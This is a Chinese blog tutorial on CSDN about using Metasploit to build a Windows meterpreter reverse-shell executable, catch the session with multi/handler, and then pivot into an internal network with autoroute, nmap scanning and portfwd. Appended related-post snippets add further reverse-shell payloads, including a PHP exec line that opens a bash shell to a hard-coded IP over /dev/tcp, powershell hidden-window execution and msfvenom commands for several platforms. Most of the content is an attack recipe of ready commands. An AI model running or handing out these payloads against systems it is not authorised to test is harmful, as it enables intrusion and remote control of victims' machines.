使用msf进行反弹shell+内网渗透

最新推荐文章于 2025-06-02 13:29:35 发布
最新推荐文章于 2025-06-02 13:29:35 发布
阅读量1.3w 收藏 22
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jsmaster01/article/details/85402292
本文详细介绍了如何使用Metasploit框架(msf)进行反弹Shell操作,包括生成客户端文件、启动监听模块及执行被控端文件的全过程。此外,还讲解了通过添加路由、探测IP及端口转发等手段进行内网渗透的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令
反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。
一、反弹shell:
1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(这里指代的是攻击机ip) lport=xxxx(这里指代的是攻击机的监听端口)-f exe(这里指代的是可执行文件的类型)-o xx.exe”。即可创建被控端的客户端文件。

2.在攻击机的msf中启动监听模块,use exploit/multi/handler,并设置相应的payload,payload的选择取决于生成被控端文件用了什么模块,名字都是一样的。接着options设置好相应的参数。在这里需要指出的是,msfconsole一定要在root权限下执行。

3.接下来将生成的被控端文件放到靶机内,并在靶机内执行。msf就可以收到靶机的session,在msf中使用sessions命令即可看到当前收到的session,并使用session 1就可以取得第一个session的会话,呼出meterpreter模块,在meterpreter模块中输入shell即可实现反弹shell。

二、内网渗透
1.在达成以上步骤后,即可添加路由,添加路由使用msf自动添加即可。具体命令为:run post/multi/manage/autoroute。

2.路由设置完毕后,即可使用ifconfig或是ipconfig探测靶机的ip情况,并使用nmap等扫描工具,对其所在的网段进行扫描。进而发现其他内网中的靶机。

3.若我们发现了一个主机开放了80端口,我们可以想象这个主机开放了web服务,此时要对此端口进行端口转发,那么我们可以在meterpreter下使用msf自带的端口转发服务,具体命令如下:“portfwd add -l xxxx(本机待转发端口) -r xxx.xxx.xxx.xxx(待转发的内网主机地址) -p xxxx(待转发的内网主机端口)”。即可实现将内网主机的端口转发到本地某端口上,并可以在本地浏览器中输入localhost:xxxx进行访问并作进一步的渗透。

JSMa4ter
关注
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 994
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
渗透——利用kali工具MSF反弹shell
爱国小白帽
03-16 5556
msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。 实验环境: Windows Server 2008 R2 x64 kali 模拟实验: 首先输入msfconsole打开软...
msf反弹shell
weixin_34179762的博客
05-15 1083
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
msf反弹shell内网渗透
OKAY_TC的博客
10-16 2013
用法示例: 1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下 //powershell执行脚本:powershell -windowstyle hidden -e...
反弹 Shell(Reverse Shell原理与实战详解
最新发布
chaoqun3的博客
06-02 1427
反弹 Shell 是指被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell;将其所有输出(stdout 和 stderr)发送给攻击者;将攻击者作为输入源(stdin),实现远程控制。核心要点描述反弹 Shell 的本质。
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 6564
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1187
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
msfpayload反弹shell
aipei5098的博客
04-14 421
1、前期-- 情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用 启动PostgreSQL服务:service postgresql start 启动metasploit服务:service metasploit start 启动msfconsole:msfconsole查看数据库连接状态...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
MSF反弹shell原理
weixin_47063945的博客
11-09 527
介绍了MSF反弹shell原理
msfvenom反弹
a439017985的博客
02-24 941
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf    Windows    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe    Mac   msfven
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 3296
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
MSF回弹木马Windows测试
weixin_63264424的博客
08-06 554
使用python3 -m http.server 9999命令搭建一个网页环境让步Windows端的用户方便下载木马软件,将木马软件传输到Windows系统中。进入系统以后就可以对里面的文件进行增删改查等操作。本次实验就圆满顺利完成。Windows主机地址为192,.168.30.128。在Kali中使用msfvenom命令创建生成监听木马。最后就可以成功进入Windows系统了。
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
云服务器msf跨域反弹shell
iuyoo的博客
03-29 6138
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
反弹shell原理和实现
u012830303的博客
01-18 3682
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
使用msf生成反弹shell
05-29
### 使用 Metasploit 框架生成反弹 Shell 的 Payload Metasploit 是一个强大的渗透测试框架,提供了多种模块和工具用于生成后门以及模拟安全攻击。以下详细介绍了如何使用 `msfvenom` 工具生成反弹 Shell 的 Payload。 #### 生成 Windows 系统的反弹 Shell Payload 对于 Windows 系统,可以生成一个带有 Meterpreter 会话的可执行文件(`.exe`)。以下是生成命令的示例: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=目标端口 -f exe -o shell.exe ``` 这条命令的作用是生成一个基于 `windows/meterpreter/reverse_tcp` 的 Payload,其中 `-p` 指定 Payload 类型,`LHOST` 是本地监听的 IP 地址,`LPORT` 是本地监听的端口号,`-f exe` 表示输出格式为可执行文件,`-o shell.exe` 指定输出文件名[^3]。 #### 生成 Linux 系统的反弹 Shell Payload 对于 Linux 系统,可以生成一个基于 Bash 或 Python 的 Payload。以下是生成 Bash 脚本的示例: ```bash msfvenom -p cmd/unix/reverse_bash LHOST=你的IP地址 LPORT=目标端口 -f raw -o shell.sh ``` 此命令生成了一个基于 `cmd/unix/reverse_bash` 的 Payload,适用于 Unix/Linux 系统。输出格式为原始数据流(`raw`),并保存为脚本文件 `shell.sh`[^4]。 #### 配置 Metasploit Framework 监听器 生成 Payload 后,需要在 Metasploit 中配置监听器以接收反弹连接。以下是配置监听器的步骤: 1. 启动 Metasploit Console。 2. 使用以下命令加载相应的 Exploit 模块: ```bash use exploit/multi/handler ``` 3. 设置 Payload 类型与生成时一致: ```bash set payload windows/meterpreter/reverse_tcp ``` 4. 设置监听 IP 和端口: ```bash set lhost 你的IP地址 set lport 目标端口 ``` 5. 开始监听: ```bash exploit ``` 当目标系统运行生成的 Payload 时,Metasploit 将捕获反弹连接并提供交互式 Shell。 #### 注意事项 在进行渗透测试或学习时,必须确保拥有合法授权。未经授权的使用可能违反法律。此外,生成的 Payload 可能会被防病毒软件检测到,因此需要考虑 Payload 的混淆或编码技术以提高成功率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值